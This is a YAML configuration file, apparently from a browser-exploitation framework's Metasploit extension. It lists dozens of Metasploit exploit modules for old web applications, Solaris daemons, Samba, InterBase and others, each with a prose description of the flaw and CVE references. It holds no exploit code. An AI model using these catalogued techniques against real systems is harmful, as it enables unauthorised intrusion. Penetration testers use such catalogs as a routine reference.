+msf_phpbb_highlight: + enable: true + msf: true + msf_key: unix/webapp/phpbb_highlight + name: phpBB viewtopic.php Arbitrary Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits two arbitrary PHP code execution flaws in the\n\ + \t\t\t\tphpBB forum system. The problem is that the 'highlight' parameter\n\ + \t\t\t\tin the 'viewtopic.php' script is not verified properly and will\n\ + \t\t\t\tallow an attacker to inject arbitrary code via preg_replace().\n\n\ + \t\t\t\tThis vulnerability was introduced in revision 3076, and finally\n\ + \t\t\t\tfixed in revision 5166. According to the \"tags\" within their tree,\n\ + \t\t\t\tthis corresponds to versions 2.0.4 through 2.0.15 (inclusive).\n\ + \t\t\t" + authors: + - - CVE + - 2005-2086 + - - CVE + - 2004-1315 + - - OSVDB + - "11719" + - - OSVDB + - "17613" + - - BID + - "14086" + - - BID + - "10701" + path: extensions/metasploit/ + class: Msf_module +msf_php_include: + enable: true + msf: true + msf_key: unix/webapp/php_include + name: PHP Remote File Include Generic Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module can be used to exploit any generic PHP file include vulnerability,\n\ + \t\t\t\twhere the application includes code like the following:\n\n\ + \t\t\t\t\n\ + \t\t\t" + authors: [] + + path: extensions/metasploit/ + class: Msf_module +msf_nagios3_statuswml_ping: + enable: true + msf: true + msf_key: unix/webapp/nagios3_statuswml_ping + name: Nagios3 statuswml.cgi Ping Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\n\ + \t\t\t\tNagios3 statuswml.cgi script. This flaw is triggered when shell\n\ + \t\t\t\tmetacharacters are present in the parameters to the ping and\n\ + \t\t\t\ttraceroute commands.\n\ + \t\t\t" + authors: + - - CVE + - 2009-2288 + - - OSVDB + - "55281" + path: extensions/metasploit/ + class: Msf_module +msf_google_proxystylesheet_exec: + enable: true + msf: true + msf_key: unix/webapp/google_proxystylesheet_exec + name: Google Appliance ProxyStyleSheet Command Execution + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a feature in the Saxon XSLT parser used by\n\ + \t\t\tthe Google Search Appliance. This feature allows for arbitrary\n\ + \t\t\tjava methods to be called. Google released a patch and advisory to\n\ + \t\t\ttheir client base in August of 2005 (GA-2005-08-m). The target appliance\n\ + \t\t\tmust be able to connect back to your machine for this exploit to work.\n\ + \t\t\t" + authors: + - - CVE + - 2005-3757 + - - OSVDB + - "20981" + - - BID + - "15509" + path: extensions/metasploit/ + class: Msf_module +msf_php_wordpress_lastpost: + enable: true + msf: true + msf_key: unix/webapp/php_wordpress_lastpost + name: WordPress cache_lastpostdate Arbitrary Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary PHP code execution flaw in the WordPress\n\ + \t\t\t\tblogging software. This vulnerability is only present when the PHP 'register_globals'\n\ + \t\t\t\toption is enabled (common for hosting providers). All versions of WordPress prior to\n\ + \t\t\t\t1.5.1.3 are affected.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2612 + - - OSVDB + - "18672" + - - BID + - "14533" + path: extensions/metasploit/ + class: Msf_module +msf_twiki_search: + enable: true + msf: true + msf_key: unix/webapp/twiki_search + name: TWiki Search Function Arbitrary Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the search component of TWiki.\n\ + \t\t\t\tBy passing a 'search' parameter containing shell metacharacters to the\n\ + \t\t\t\t'WebSearch' script, an attacker can execute arbitrary OS commands.\n\ + \t\t\t" + authors: + - - CVE + - 2004-1037 + - - OSVDB + - "11714" + - - BID + - "11674" + - - URL + - http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch + path: extensions/metasploit/ + class: Msf_module +msf_phpmyadmin_config: + enable: true + msf: true + msf_key: unix/webapp/phpmyadmin_config + name: PhpMyAdmin Config File Code Injection + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in PhpMyAdmin's setup\n\ + \t\t\t\tfeature which allows an attacker to inject arbitrary PHP\n\ + \t\t\t\tcode into a configuration file. The original advisory says\n\ + \t\t\t\tthe vulnerability is present in phpMyAdmin versions 2.11.x\n\ + \t\t\t\t< 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on\n\ + \t\t\t\t3.0.1.1.\n\n\ + \t\t\t\tThe file where our payload is written\n\ + \t\t\t\t(phpMyAdmin/config/config.inc.php) is not directly used by\n\ + \t\t\t\tthe system, so it may be a good idea to either delete it or\n\ + \t\t\t\tcopy the running config (phpMyAdmin/config.inc.php) over it\n\ + \t\t\t\tafter successful exploitation.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1151 + - - OSVDB + - "53076" + - - URL + - http://www.milw0rm.com/exploits/8921 + - - URL + - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php + - - URL + - http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/ + path: extensions/metasploit/ + class: Msf_module +msf_generic_exec: + enable: true + msf: true + msf_key: unix/webapp/generic_exec + name: Generic Web Application Unix Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module can be used to exploit any generic command execution vulnerability\n\ + \t\t\t\tfor CGI applications on Unix-like platforms. To use this module, specify the\n\ + \t\t\t\tCMDURI path, replacing the command itself with XXcmdXX. This module is currently\n\ + \t\t\t\tlimited to forms vulnerable through GET requests with query parameters.\n\ + \t\t\t" + authors: [] + + path: extensions/metasploit/ + class: Msf_module +msf_citrix_access_gateway_exec: + enable: true + msf: true + msf_key: unix/webapp/citrix_access_gateway_exec + name: Citrix Access Gateway Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThe Citrix Access Gateway provides support for multiple authentication types.\n\ + \t\t\t\tWhen utilizing the external legacy NTLM authentication module known as\n\ + \t\t\t\tntlm_authenticator the Access Gateway spawns the Samba 'samedit' command\n\ + \t\t\t\tline utility to verify a user's identity and password. By embedding shell\n\ + \t\t\t\tmetacharacters in the web authentication form it is possible to execute\n\ + \t\t\t\tarbitrary commands on the Access Gateway.\n\ + \t\t\t" + authors: + - - CVE + - 2010-4566 + - - OSVDB + - "70099" + - - BID + - "45402" + - - URL + - http://www.vsecurity.com/resources/advisory/20101221-1/ + path: extensions/metasploit/ + class: Msf_module +msf_cakephp_cache_corruption: + enable: true + msf: true + msf_key: unix/webapp/cakephp_cache_corruption + name: CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tCakePHP is a popular PHP framework for building web applications.\n\ + \t\t\t\tThe Security component of CakePHP is vulnerable to an unserialize attack which\n\ + \t\t\t\tcould be abused to allow unauthenticated attackers to execute arbitrary\n\ + \t\t\t\tcode with the permissions of the webserver.\n\ + \t\t\t" + authors: + - - OSVDB + - "69352" + - - CVE + - 2010-4335 + - - BID + - "44852" + - - URL + - http://packetstormsecurity.org/files/view/95847/burnedcake.py.txt + path: extensions/metasploit/ + class: Msf_module +msf_oracle_vm_agent_utl: + enable: true + msf: true + msf_key: unix/webapp/oracle_vm_agent_utl + name: Oracle VM Server Virtual Server Agent Command Injection + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a command injection flaw within Oracle\\'s VM Server\n\ + \t\t\t\tVirtual Server Agent (ovs-agent) service.\n\n\ + \t\t\t\tBy including shell meta characters within the second parameter to the 'utl_test_url'\n\ + \t\t\t\tXML-RPC methodCall, an attacker can execute arbitrary commands. The service\n\ + \t\t\t\ttypically runs with root privileges.\n\n\ + \t\t\t\tNOTE: Valid credentials are required to trigger this vulnerable. The username\n\ + \t\t\t\tappears to be hardcoded as 'oracle', but the password is set by the administrator\n\ + \t\t\t\tat installation time.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3585 + - - OSVDB + - "68797" + - - BID + - "44047" + path: extensions/metasploit/ + class: Msf_module +msf_tikiwiki_graph_formula_exec: + enable: true + msf: true + msf_key: unix/webapp/tikiwiki_graph_formula_exec + name: TikiWiki tiki-graph_formula Remote PHP Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tTikiWiki (<= 1.9.8) contains a flaw that may allow a remote\n\ + \t\t\t\tattacker to execute arbitrary PHP code. The issue is due to\n\ + \t\t\t\t'tiki-graph_formula.php' script not properly sanitizing user\n\ + \t\t\t\tinput supplied to create_function(), which may allow a remote\n\ + \t\t\t\tattacker to execute arbitrary PHP code resulting in a loss of\n\ + \t\t\t\tintegrity.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5423 + - - OSVDB + - "40478" + - - BID + - "26006" + path: extensions/metasploit/ + class: Msf_module +msf_guestbook_ssi_exec: + enable: true + msf: true + msf_key: unix/webapp/guestbook_ssi_exec + name: Matt Wright guestbook.pl Arbitrary Command Execution + category: Metasploit + description: "\n\ + \t\t\t\tThe Matt Wright guestbook.pl <= v2.3.1 CGI script contains\n\ + \t\t\t\ta flaw that may allow arbitrary command execution. The vulnerability\n\ + \t\t\t\trequires that HTML posting is enabled in the guestbook.pl script, and\n\ + \t\t\t\tthat the web server must have the Server-Side Include (SSI) script\n\ + \t\t\t\thandler enabled for the '.html' file type. By combining the script\n\ + \t\t\t\tweakness with non-default server configuration, it is possible to exploit\n\ + \t\t\t\tthis vulnerability successfully.\n\ + \t\t\t" + authors: + - - CVE + - 1999-1053 + - - OSVDB + - "84" + - - BID + - "776" + path: extensions/metasploit/ + class: Msf_module +msf_awstats_configdir_exec: + enable: true + msf: true + msf_key: unix/webapp/awstats_configdir_exec + name: AWStats configdir Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\ + \t\t\t\t\tAWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2\n\ + \t\t\t\t\tare vulnerable.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0116 + - - OSVDB + - "13002" + - - BID + - "12298" + - - URL + - http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities + path: extensions/metasploit/ + class: Msf_module +msf_cacti_graphimage_exec: + enable: true + msf: true + msf_key: unix/webapp/cacti_graphimage_exec + name: Cacti graph_view.php Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\ + \t\t\t\tRaxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to\n\ + \t\t\t\t0.8.6-d are vulnerable.\n\ + \t\t\t" + authors: + - - OSVDB + - "17539" + - - BID + - "14042" + path: extensions/metasploit/ + class: Msf_module +msf_php_xmlrpc_eval: + enable: true + msf: true + msf_key: unix/webapp/php_xmlrpc_eval + name: PHP XML-RPC Arbitrary Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary code execution flaw\n\ + \t\t\t\tdiscovered in many implementations of the PHP XML-RPC module.\n\ + \t\t\t\tThis flaw is exploitable through a number of PHP web\n\ + \t\t\t\tapplications, including but not limited to Drupal, Wordpress,\n\ + \t\t\t\tPostnuke, and TikiWiki.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1921 + - - OSVDB + - "17793" + - - BID + - "14088" + path: extensions/metasploit/ + class: Msf_module +msf_joomla_tinybrowser: + enable: true + msf: true + msf_key: unix/webapp/joomla_tinybrowser + name: Joomla 1.5.12 TinyBrowser File Upload Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the TinyMCE/tinybrowser plugin.\n\ + \t\t\t\tThis plugin is not secured in version 1.5.12 of joomla and allows the upload\n\ + \t\t\t\tof files on the remote server.\n\ + \t\t\t\tBy renaming the uploaded file this vulnerability can be used to upload/execute\n\ + \t\t\t\tcode on the affected system.\n\ + \t\t\t" + authors: + - - OSVDB + - "64578" + - - URL + - http://milw0rm.com/exploits/9296 + - - URL + - http://developer.joomla.org/security/news/301-20090722-core-file-upload.html + path: extensions/metasploit/ + class: Msf_module +msf_mitel_awc_exec: + enable: true + msf: true + msf_key: unix/webapp/mitel_awc_exec + name: Mitel Audio and Web Conferencing Command Injection + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a command injection flaw within the Mitel\n\ + \t\t\t\tAudio and Web Conferencing web interface.\n\ + \t\t\t" + authors: + - - URL + - http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14 + - - OSVDB + - "69934" + path: extensions/metasploit/ + class: Msf_module +msf_openview_connectednodes_exec: + enable: true + msf: true + msf_key: unix/webapp/openview_connectednodes_exec + name: HP Openview connectedNodes.ovpl Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\ + \t\t\t\tHP OpenView connectedNodes.ovpl CGI application. The results of the command\n\ + \t\t\t\twill be displayed to the screen.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2773 + - - OSVDB + - "19057" + - - BID + - "14662" + path: extensions/metasploit/ + class: Msf_module +msf_barracuda_img_exec: + enable: true + msf: true + msf_key: unix/webapp/barracuda_img_exec + name: Barracuda IMG.PL Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\ + \t\t\t\tBarracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2847 + - - OSVDB + - "19279" + - - BID + - "14712" + - - NSS + - "19556" + - - URL + - http://www.securiweb.net/wiki/Ressources/AvisDeSecurite/2005.1 + path: extensions/metasploit/ + class: Msf_module +msf_mambo_cache_lite: + enable: true + msf: true + msf_key: unix/webapp/mambo_cache_lite + name: Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a remote file inclusion vulnerability in\n\ + \t\t\t\tincludes/Cache/Lite/Output.php in the Cache_Lite package in Mambo\n\ + \t\t\t\t4.6.4 and earlier.\n\ + \t\t\t" + authors: + - - CVE + - 2008-2905 + - - OSVDB + - "46173" + - - BID + - "29716" + path: extensions/metasploit/ + class: Msf_module +msf_pajax_remote_exec: + enable: true + msf: true + msf_key: unix/webapp/pajax_remote_exec + name: PAJAX Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tRedTeam has identified two security flaws in PAJAX (<= 0.5.1).\n\ + \t\t\t\tIt is possible to execute arbitrary PHP code from unchecked user input.\n\ + \t\t\t\tAdditionally, it is possible to include arbitrary files on the server\n\ + \t\t\t\tending in \".class.php\".\n\ + \t\t\t" + authors: + - - CVE + - 2006-1551 + - - OSVDB + - "24618" + - - BID + - "17519" + - - URL + - http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php + path: extensions/metasploit/ + class: Msf_module +msf_base_qry_common: + enable: true + msf: true + msf_key: unix/webapp/base_qry_common + name: BASE base_qry_common Remote File Include + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a remote file inclusion vulnerability in\n\ + \t\t\t\tthe base_qry_common.php file in BASE 1.2.4 and earlier.\n\ + \t\t\t" + authors: + - - CVE + - 2006-2685 + - - OSVDB + - "49366" + - - BID + - "18298" + path: extensions/metasploit/ + class: Msf_module +msf_trixbox_langchoice: + enable: true + msf: true + msf_key: unix/webapp/trixbox_langchoice + name: Trixbox langChoice PHP Local File Inclusion + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module injects php into the trixbox session file and then, in a second call, evaluates\n\ + \t\t\t\tthat code by manipulating the langChoice parameter as described in OSVDB-50421.\n\ + \t\t\t" + authors: [] + + path: extensions/metasploit/ + class: Msf_module +msf_redmine_scm_exec: + enable: true + msf: true + msf_key: unix/webapp/redmine_scm_exec + name: Redmine SCM Repository Arbitrary Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\ + \t\t\t\tRedmine repository controller. The flaw is triggered when a rev parameter\n\ + \t\t\t\tis passed to the command line of the SCM tool without adequate filtering.\n\ + \t\t\t" + authors: + - - OSVDB + - "70090" + - - URL + - http://www.redmine.org/news/49 + path: extensions/metasploit/ + class: Msf_module +msf_heap_noir: + enable: true + msf: true + msf_key: solaris/dtspcd/heap_noir + name: Solaris dtspcd Heap Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is a port of noir's dtspcd exploit. This module should\n\ + \t\t\t\twork against any vulnerable version of Solaris 8 (sparc).\n\ + \t\t\t\tThe original exploit code was published in the book\n\ + \t\t\t\tShellcoder's Handbook.\n\ + \t\t\t" + authors: + - - CVE + - 2001-0803 + - - OSVDB + - "4503" + - - BID + - "3517" + - - URL + - http://www.cert.org/advisories/CA-2001-31.html + - - URL + - http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip + path: extensions/metasploit/ + class: Msf_module +msf_ttyprompt: + enable: true + msf: true + msf_key: solaris/telnet/ttyprompt + name: Solaris in.telnetd TTYPROMPT Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module uses a buffer overflow in the Solaris 'login'\n\ + \t\t\tapplication to bypass authentication in the telnet daemon.\n\ + \t\t\t" + authors: + - - CVE + - 2001-0797 + - - OSVDB + - "690" + - - BID + - "5531" + path: extensions/metasploit/ + class: Msf_module +msf_fuser: + enable: true + msf: true + msf_key: solaris/telnet/fuser + name: Sun Solaris Telnet Remote Authentication Bypass Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits the argument injection vulnerabilty\n\ + \t\t\t\tin the telnet daemon (in.telnetd) of Solaris 10 and 11.\n\ + \t\t\t" + authors: + - - CVE + - 2007-0882 + - - OSVDB + - "31881" + - - BID + - "22512" + path: extensions/metasploit/ + class: Msf_module +msf_trans2open: + enable: true + msf: true + msf_key: freebsd/samba/trans2open + name: Samba trans2open Overflow (*BSD x86) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits the buffer overflow found in Samba versions\n\ + \t\t\t\t2.2.0 to 2.2.8. This particular module is capable of\n\ + \t\t\t\texploiting the flaw on x86 Linux systems that do not\n\ + \t\t\t\thave the noexec stack option set.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0201 + - - OSVDB + - "4469" + - - BID + - "7294" + - - URL + - http://seclists.org/bugtraq/2003/Apr/103 + path: extensions/metasploit/ + class: Msf_module +msf_lsa_transnames_heap: + enable: true + msf: true + msf_key: osx/samba/lsa_transnames_heap + name: Samba lsa_io_trans_names Heap Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module triggers a heap overflow in the LSA RPC service\n\ + \t\t\tof the Samba daemon. This module uses the szone_free() to overwrite\n\ + \t\t\tthe size() or free() pointer in initial_malloc_zones structure.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2446 + - - OSVDB + - "34699" + path: extensions/metasploit/ + class: Msf_module +msf_sadmind_adm_build_path: + enable: true + msf: true + msf_key: solaris/sunrpc/sadmind_adm_build_path + name: Sun Solaris sadmind adm_build_path() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow vulnerability in adm_build_path()\n\ + \t\t\t\tfunction of sadmind daemon.\n\n\ + \t\t\t\tThe distributed system administration daemon (sadmind) is the daemon used by\n\ + \t\t\t\tSolstice AdminSuite applications to perform distributed system administration\n\ + \t\t\t\toperations.\n\n\ + \t\t\t\tThe sadmind daemon is started automatically by the inetd daemon whenever a\n\ + \t\t\t\trequest to invoke an operation is received. The sadmind daemon process\n\ + \t\t\t\tcontinues to run for 15 minutes after the last request is completed, unless a\n\ + \t\t\t\tdifferent idle-time is specified with the -i command line option. The sadmind\n\ + \t\t\t\tdaemon may be started independently from the command line, for example, at\n\ + \t\t\t\tsystem boot time. In this case, the -i option has no effect; sadmind continues\n\ + \t\t\t\tto run, even if there are no active requests.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4556 + - - OSVDB + - "49111" + - - URL + - http://risesecurity.org/advisories/RISE-2008001.txt + path: extensions/metasploit/ + class: Msf_module +msf_sadmind_exec: + enable: true + msf: true + msf_key: solaris/sunrpc/sadmind_exec + name: Solaris sadmind Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploit targets a weakness in the default security\n\ + \t\t\t\tsettings of the sadmind RPC application. This server is\n\ + \t\t\t\tinstalled and enabled by default on most versions of the\n\ + \t\t\t\tSolaris operating system.\n\n\ + \t\t\t\tVulnerable systems include solaris 2.7, 8, and 9\n\ + \t\t\t" + authors: + - - CVE + - 2003-0722 + - - OSVDB + - "4585" + - - BID + - "8615" + - - URL + - http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html + path: extensions/metasploit/ + class: Msf_module +msf_ypupdated_exec: + enable: true + msf: true + msf_key: solaris/sunrpc/ypupdated_exec + name: Solaris ypupdated Command Execution + category: Metasploit + description: "\n\ + \t\t\t\tThis exploit targets a weakness in the way the ypupdated RPC\n\ + \t\t\t\tapplication uses the command shell when handling a MAP UPDATE\n\ + \t\t\t\trequest. Extra commands may be launched through this command\n\ + \t\t\t\tshell, which runs as root on the remote host, by passing\n\ + \t\t\t\tcommands in the format '|'.\n\n\ + \t\t\t\tVulnerable systems include Solaris 2.7, 8, 9, and 10, when\n\ + \t\t\t\typupdated is started with the '-i' command-line option.\n\ + \t\t\t" + authors: + - - CVE + - 1999-0209 + - - OSVDB + - "11517" + - - BID + - "1749" + path: extensions/metasploit/ + class: Msf_module +msf_sendmail_exec: + enable: true + msf: true + msf_key: solaris/lpd/sendmail_exec + name: Solaris LPD Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary command execution flaw in\n\ + \t\t\t\tthe in.lpd service shipped with all versions of Sun Solaris\n\ + \t\t\t\tup to and including 8.0. This module uses a technique\n\ + \t\t\t\tdiscovered by Dino Dai Zovi to exploit the flaw without\n\ + \t\t\t\tneeding to know the resolved name of the attacking system.\n\ + \t\t\t" + authors: + - - CVE + - 2001-1583 + - - OSVDB + - "15131" + - - BID + - "3274" + path: extensions/metasploit/ + class: Msf_module +msf_gld_postfix: + enable: true + msf: true + msf_key: linux/misc/gld_postfix + name: GLD (Greylisting Daemon) Postfix Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in the Salim Gasmi\n\ + \t\t\t\tGLD <= 1.4 greylisting daemon for Postfix. By sending an\n\ + \t\t\t\toverly long string the stack can be overwritten.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1099 + - - OSVDB + - "15492" + - - BID + - "13129" + - - URL + - http://www.milw0rm.com/exploits/934 + path: extensions/metasploit/ + class: Msf_module +msf_ib_inet_connect: + enable: true + msf: true + msf_key: linux/misc/ib_inet_connect + name: Borland InterBase INET_connect() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\ + \t\t\t\tby sending a specially crafted service attach request.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5243 + - - OSVDB + - "38605" + - - BID + - "25917" + - - URL + - http://www.risesecurity.org/advisories/RISE-2007002.txt + path: extensions/metasploit/ + class: Msf_module +msf_netsupport_manager_agent: + enable: true + msf: true + msf_key: linux/misc/netsupport_manager_agent + name: NetSupport Manager Agent Remote Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in NetSupport Manager Agent. It\n\ + \t\t\t\tuses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.\n\ + \t\t\t" + authors: + - - CVE + - 2011-0404 + - - OSVDB + - "70408" + - - BID + - "45728" + - - URL + - http://seclists.org/fulldisclosure/2011/Jan/90 + - - URL + - http://www.exploit-db.com/exploits/15937/ + path: extensions/metasploit/ + class: Msf_module +msf_lprng_format_string: + enable: true + msf: true + msf_key: linux/misc/lprng_format_string + name: LPRng use_syslog Remote Format String Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a format string vulnerability in the LPRng print server.\n\ + \t\t\t\tThis vulnerability was discovered by Chris Evans. There was a publicly\n\ + \t\t\t\tcirculating worm targeting this vulnerability, which prompted RedHat to pull\n\ + \t\t\t\ttheir 7.0 release. They consequently re-released it as \"7.0-respin\".\n\ + \t\t\t" + authors: + - - CVE + - 2000-0917 + - - OSVDB + - "421" + - - BID + - "1712" + - - US-CERT-VU + - "382365" + - - URL + - http://www.cert.org/advisories/CA-2000-22.html + - - URL + - https://bugzilla.redhat.com/show_bug.cgi?id=17756 + - - URL + - http://www.exploit-db.com/exploits/226 + - - URL + - http://www.exploit-db.com/exploits/227 + - - URL + - http://www.exploit-db.com/exploits/230 + path: extensions/metasploit/ + class: Msf_module +msf_ib_open_marker_file: + enable: true + msf: true + msf_key: linux/misc/ib_open_marker_file + name: Borland InterBase open_marker_file() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\ + \t\t\t\tby sending a specially crafted attach request.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5244 + - - OSVDB + - "38610" + - - BID + - "25917" + - - URL + - http://www.risesecurity.org/advisories/RISE-2007002.txt + path: extensions/metasploit/ + class: Msf_module +msf_accellion_fta_mpipe2: + enable: true + msf: true + msf_key: linux/misc/accellion_fta_mpipe2 + name: Accellion File Transfer Appliance MPIPE2 Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a chain of vulnerabilities in the Accellion \n\ + \t\t\t\tFile Transfer appliance. This appliance exposes a UDP service on \n\ + \t\t\t\tport 8812 that acts as a gateway to the internal communication bus. \n\ + \t\t\t\tThis service uses Blowfish encryption for authentication, but the \n\ + \t\t\t\tappliance ships with two easy to guess default authentication keys. \n\ + \t\t\t\tThis module abuses the known default encryption keys to inject a \n\ + \t\t\t\tmessage into the communication bus. In order to execute arbitrary \n\ + \t\t\t\tcommands on the remote appliance, a message is injected into the bus \n\ + \t\t\t\tdestined for the 'matchrep' service. This service exposes a function \n\ + \t\t\t\tnamed 'insert_plugin_meta_info' which is vulnerable to an input \n\ + \t\t\t\tvalidation flaw in a call to system(). This provides access to the \n\ + \t\t\t\t'soggycat' user account, which has sudo privileges to run the \n\ + \t\t\t\tprimary admin tool as root. These two flaws are fixed in update\n\ + \t\t\t\tversion FTA_8_0_562.\t\n\ + \t\t\t" + authors: + - - OSVDB + - "71362" + - - OSVDB + - "71363" + - - URL + - http://www.rapid7.com/security-center/advisories/R7-0039.jsp + path: extensions/metasploit/ + class: Msf_module +msf_ib_pwd_db_aliased: + enable: true + msf: true + msf_key: linux/misc/ib_pwd_db_aliased + name: Borland InterBase PWD_db_aliased() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\ + \t\t\t\tby sending a specially crafted attach request.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5243 + - - OSVDB + - "38607" + - - BID + - "25917" + - - URL + - http://www.risesecurity.org/advisories/RISE-2007002.txt + path: extensions/metasploit/ + class: Msf_module +msf_drb_remote_codeexec: + enable: true + msf: true + msf_key: linux/misc/drb_remote_codeexec + name: Distributed Ruby Send instance_eval/syscall Code Execution + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits remote code execution vulnerabilities in dRuby\n\ + \t\t\t" + authors: [] + + path: extensions/metasploit/ + class: Msf_module +msf_ib_jrd8_create_database: + enable: true + msf: true + msf_key: linux/misc/ib_jrd8_create_database + name: Borland InterBase jrd8_create_database() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\ + \t\t\t\tby sending a specially crafted create request.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5243 + - - OSVDB + - "38606" + - - BID + - "25917" + - - URL + - http://www.risesecurity.org/advisories/RISE-2007002.txt + path: extensions/metasploit/ + class: Msf_module +msf_hplip_hpssd_exec: + enable: true + msf: true + msf_key: linux/misc/hplip_hpssd_exec + name: hplip hpssd.py From Address Arbitrary Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a command execution vulnerable in the hpssd.py\n\ + \t\t\t\tdaemon of the Hewlett-Packard Linux Imaging and Printing Project.\n\ + \t\t\t\tAccording to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable.\n\n\ + \t\t\t\tThis module was written and tested using the Fedora 6 Linux distribution.\n\ + \t\t\t\tOn the test system, the daemon listens on localhost only and runs with\n\ + \t\t\t\troot privileges. Although the configuration shows the daemon is to\n\ + \t\t\t\tlisten on port 2207, it actually listens on a dynamic port.\n\n\ + \t\t\t\tNOTE: If the target system does not have a 'sendmail' command installed,\n\ + \t\t\t\tthis vulnerability cannot be exploited.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5208 + - - OSVDB + - "41693" + - - BID + - "26054" + - - URL + - https://bugzilla.redhat.com/show_bug.cgi?id=319921 + - - URL + - https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit + path: extensions/metasploit/ + class: Msf_module +msf_mysql_yassl_getname: + enable: true + msf: true + msf_key: linux/mysql/mysql_yassl_getname + name: MySQL yaSSL CertDecoder::GetName Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)\n\ + \t\t\t\timplementation bundled with MySQL. By sending a specially crafted\n\ + \t\t\t\tclient certificate, an attacker can execute arbitrary code.\n\n\ + \t\t\t\tThis vulnerability is present within the CertDecoder::GetName function inside\n\ + \t\t\t\t\"taocrypt/src/asn.cpp\". However, the stack buffer that is written to exists\n\ + \t\t\t\twithin a parent function's stack frame.\n\n\ + \t\t\t\tNOTE: This vulnerability requires a non-default configuration. First, the attacker\n\ + \t\t\t\tmust be able to pass the host-based authentication. Next, the server must be\n\ + \t\t\t\tconfigured to listen on an accessible network interface. Lastly, the server\n\ + \t\t\t\tmust have been manually configured to use SSL.\n\n\ + \t\t\t\tThe binary from version 5.5.0-m2 was built with /GS 